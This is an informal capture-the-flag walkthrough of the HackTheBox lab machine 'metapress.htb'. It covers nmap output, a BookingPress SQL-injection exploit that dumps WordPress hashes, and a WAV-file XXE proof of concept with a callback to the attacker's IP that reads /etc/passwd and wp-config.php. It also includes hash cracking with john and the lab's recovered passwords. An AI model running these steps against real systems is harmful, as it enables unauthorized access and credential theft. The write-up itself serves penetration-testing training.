PORT   STATE SERVICE VERSION
21/tcp open  ftp?
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (Debian) [::ffff:10.10.11.186]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA)
|   256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA)
|_  256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519)
80/tcp open  http    nginx 1.18.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://metapress.htb/

 

I run wordpress scan but didnt find anything interesting other than the users “admin” and “manager”

Website is running wordpress 5.6.2. The site also has an events page which has a vulnerable version of booking press 1.0.10

http://metapress.htb/events/

 

There were 2 CVEs i found. One was built for this box but I wanted to do it on my own so we used https://github.com/destr4ct/CVE-2022-0739/blob/main/README.md

This python script requires a URL and a "Nonce" which i assume is like a cookie which is why my previous scripts failed. We find the nonce in the source code of the website at the events page.

 

Nonce = d97102a77b

 

This allows us to get the hashes for admin and manager

 

|admin|admin@metapress.htb|$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
|manager|manager@metapress.htb|$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70

 

manager cracks to partylikearockstar

 

using a POC we can read files by uploading evil wav files and it sends a callback to our computer

python3 PoC.py  -l 10.10.14.20 -p 1337 -f /etc/passwd

 

download the decode.php and input the base64 string into the decode script to decode the output

 

User is jnelson

I wasted a ton of time trying to find the wp-config.php file. HTB gave me a hint saying it was wp_config.php but it doesnt have an underscore so nothing worked. I had to eventually cheat after hours of trying different locations.

python3 PoC.py  -l 10.10.14.20 -p 1338 -f ../wp-config.php

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );
 

We can then FTP into the machine

 

We find a send_email.php file with a login for jnelson

$mail->Username = "jnelson@metapress.htb";                 
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";

and we can ssh in using those creds

 

mysql login but theres nothing interesting

╔══════════╣ Analyzing Wordpress Files (limit 70)
-rw-r--r-- 1 www-data www-data 2032 Jun 23  2022 /var/www/metapress.htb/blog/wp-config.php
define( 'DB_NAME', 'blog' );
define( 'DB_USER', 'blog' );
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );

IN the keypass directory there is a hidden .keys file

we can grab the private key and use gpg2john to get a hash and crack it

 

gpg2john hash.gpg > super1.txt

john super1.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=gpg
hash cracks to blink182

 

 

Now with the password we can output the root password and su

passpie copy ssh --to stdout

root password p7qfAZt4_A1xo_0x